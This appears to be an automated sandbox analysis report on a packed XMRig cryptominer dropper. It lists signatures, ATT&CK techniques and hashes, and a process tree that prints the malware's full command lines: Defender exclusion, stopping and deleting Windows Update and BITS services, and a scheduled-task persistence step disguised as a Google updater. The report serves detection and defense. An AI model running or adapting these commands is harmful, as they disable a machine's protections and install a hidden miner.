xmrig | 305fb7b5adde837bdadd1cae12c836afd054ce08d92cc45e4d31849c85cd7e77

Analysis

max time kernel
300s
max time network
279s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
03-10-2022 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

555.exe
Size

7.1MB
MD5

1811298c479bc582f551f733c4c11f7d
SHA1

78d2b2c8f2a7c4cd4019cbdf356cafa928cadc9f
SHA256

305fb7b5adde837bdadd1cae12c836afd054ce08d92cc45e4d31849c85cd7e77
SHA512

986f7cfe4f82ce8a8225e44c2fe7c1f9c23dd6536d28b16cc882c5eec2757b3bca0a12892b7e834b9d27757cd41d69aef42696a8ea3eb21dc4ff53a2b60d842f
SSDEEP

196608:iqFm0FXrzx4rtPVbFxPXQha2j+VE7fVhoKqeGb5K/5zU:iairpp7CanVE7T9TEE5zU

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

555.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 555.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	555.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1560-166-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1560-168-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

555.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts 555.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1572 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	555.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
1572	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1560-166-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1560-168-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

555.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	555.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	555.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1972 taskeng.exe

pid	process
1972	taskeng.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1644-54-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-55-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-57-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-58-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-60-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-61-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-67-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
behavioral1/memory/1644-101-0x000000013F4C0000-0x00000001401C0000-memory.dmp	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1572-115-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-118-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-117-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-116-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-120-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-119-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-122-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-127-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
behavioral1/memory/1572-164-0x000000013F1F0000-0x000000013FEF0000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

555.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	555.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

555.exeupdater.exe

pid process

1644 555.exe
1572 updater.exe

pid	process
1644	555.exe
1572	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1572 set thread context of 1496	1572	updater.exe	conhost.exe
PID 1572 set thread context of 1560	1572	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

555.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	555.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

780 sc.exe
808 sc.exe
608 sc.exe
1532 sc.exe
1540 sc.exe
1252 sc.exe
1268 sc.exe
1352 sc.exe
876 sc.exe
1924 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1272 schtasks.exe
1164 schtasks.exe

pid	process
780	sc.exe
808	sc.exe
608	sc.exe
1532	sc.exe
1540	sc.exe
1252	sc.exe
1268	sc.exe
1352	sc.exe
876	sc.exe
1924	sc.exe

pid	process
1272	schtasks.exe
1164	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90828293eed6d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
748	powershell.exe
900	powershell.exe
1720	powershell.exe
1500	powershell.exe
780	powershell.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe
1560	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	748	powershell.exe
Token: SeShutdownPrivilege	1816	powercfg.exe
Token: SeShutdownPrivilege	1000	powercfg.exe
Token: SeShutdownPrivilege	1868	powercfg.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeShutdownPrivilege	1780	powercfg.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeShutdownPrivilege	588	powercfg.exe
Token: SeShutdownPrivilege	1272	powercfg.exe
Token: SeShutdownPrivilege	1504	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1044	WMIC.exe
Token: SeUndockPrivilege	1044	WMIC.exe
Token: SeManageVolumePrivilege	1044	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1044	WMIC.exe
Token: SeUndockPrivilege	1044	WMIC.exe
Token: SeManageVolumePrivilege	1044	WMIC.exe
Token: SeLockMemoryPrivilege	1560	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

555.execmd.execmd.exepowershell.exepowershell.exetaskeng.exe

description	pid	process	target process
PID 1644 wrote to memory of 748	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 748	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 748	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 1412	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 1412	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 1412	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 1240	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 1240	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 1240	1644	555.exe	cmd.exe
PID 1644 wrote to memory of 900	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 900	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 900	1644	555.exe	powershell.exe
PID 1412 wrote to memory of 1924	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1924	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1924	1412	cmd.exe	sc.exe
PID 1240 wrote to memory of 1816	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1816	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1816	1240	cmd.exe	powercfg.exe
PID 1412 wrote to memory of 1352	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1352	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1352	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 876	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 876	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 876	1412	cmd.exe	sc.exe
PID 1240 wrote to memory of 1000	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1000	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1000	1240	cmd.exe	powercfg.exe
PID 1412 wrote to memory of 1268	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1268	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 1268	1412	cmd.exe	sc.exe
PID 1240 wrote to memory of 1868	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1868	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1868	1240	cmd.exe	powercfg.exe
PID 1412 wrote to memory of 780	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 780	1412	cmd.exe	sc.exe
PID 1412 wrote to memory of 780	1412	cmd.exe	sc.exe
PID 1240 wrote to memory of 1780	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1780	1240	cmd.exe	powercfg.exe
PID 1240 wrote to memory of 1780	1240	cmd.exe	powercfg.exe
PID 1412 wrote to memory of 1164	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1164	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1164	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1952	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1952	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1952	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 668	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 668	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 668	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 552	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 552	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 552	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1092	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1092	1412	cmd.exe	reg.exe
PID 1412 wrote to memory of 1092	1412	cmd.exe	reg.exe
PID 900 wrote to memory of 1272	900	powershell.exe	schtasks.exe
PID 900 wrote to memory of 1272	900	powershell.exe	schtasks.exe
PID 900 wrote to memory of 1272	900	powershell.exe	schtasks.exe
PID 1644 wrote to memory of 1720	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 1720	1644	555.exe	powershell.exe
PID 1644 wrote to memory of 1720	1644	555.exe	powershell.exe
PID 1720 wrote to memory of 1212	1720	powershell.exe	schtasks.exe
PID 1720 wrote to memory of 1212	1720	powershell.exe	schtasks.exe
PID 1720 wrote to memory of 1212	1720	powershell.exe	schtasks.exe
PID 1972 wrote to memory of 1572	1972	taskeng.exe	updater.exe

C:\Users\Admin\AppData\Local\Temp\555.exe
"C:\Users\Admin\AppData\Local\Temp\555.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1924

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1352

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:876

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1268

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:780

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1164

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1952

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:668

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:552

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1092

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:1272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#vxyhz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1212

C:\Windows\system32\taskeng.exe
taskeng.exe {DF46C45B-DD75-4B3B-BEDF-73247C04F227} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1312

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:808

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:608

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1532

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1540

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1252

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:748

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:912

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:900

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:2044

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1700

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:840

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
4⤵
- Creates scheduled task(s)
PID:1164

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe wygzabxfbktab
3⤵
PID:1496

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
4⤵
- Drops file in Program Files directory
PID:1564

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:1824

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe yluxxonfmsqtfwpr GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1htkUt/8aAdr6yQCo+wN61IVXg3oZHUHUUBFwXWKf1by
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
b47a5db99257e5746288f2e91f5d856f

SHA1
51117d33f41ffcf408f97eba2bcfcb861081e6bb

SHA256
50912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f

SHA512
ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
b47a5db99257e5746288f2e91f5d856f

SHA1
